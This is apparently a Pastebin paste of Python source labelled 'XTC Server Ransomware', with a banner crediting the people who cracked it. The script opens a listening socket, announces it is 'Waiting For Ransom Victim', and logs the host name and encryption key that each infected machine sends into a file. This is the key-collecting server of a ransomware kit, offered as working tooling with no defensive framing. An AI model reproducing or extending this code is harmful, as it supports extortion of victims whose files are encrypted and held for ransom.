Advertisement
Guest User

XTC Server Ransomware

a guest
Oct 17th, 2022
386
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.50 KB | None | 0 0
  1. from ipaddress import ip_address
  2. import socket
  3. import os
  4. import colorama
  5. from colorama import Fore
  6. from os import system
  7.  
  8. def water(text):
  9. system(""); faded = ""
  10. green = 10
  11. for line in text.splitlines():
  12. faded += (f"\033[38;2;0;{green};255m{line}\033[0m\n")
  13. if not green == 255:
  14. green += 15
  15. if green > 255:
  16. green = 255
  17. return faded
  18.  
  19. print(water("""
  20. ______ __ _ ______________
  21. / ____/___ ____________ ______ / /_ \ \/ /___ ___/ __/
  22. / __/ / __ \/ ___/ ___/ / / / __ \/ __/ \ / / / / /
  23. / /___/ / / / /__/ / / /_/ / /_/ / /_ / \ / / / /__
  24. /_____/_/ /_/\___/_/ \__, / .___/\__/ /_/\ _\/_/ \___/
  25. /____/_/
  26.  
  27. Made By XTC Cracked By Net Monkes & Hacker Bug & PWN
  28. """))
  29.  
  30. ip_address = '192.168.1.118'
  31. port = 5678
  32.  
  33. print('Creating Socket')
  34. with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
  35. s.bind((ip_address, port))
  36. print(f'[!] Waiting For Ransom Victim [!]')
  37. s.listen(1)
  38. conn, addr = s.accept()
  39. print(f'[>] Connection From {addr} Successful')
  40. with conn:
  41. while True:
  42. host_and_key = conn.recv(1024).decode()
  43. with open('encrypted_hosts.txt', 'a') as f:
  44. f.write(host_and_key+'\n')
  45. break
  46. print(f'[>] Connection Completed and Closed')
  47.  
  48.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement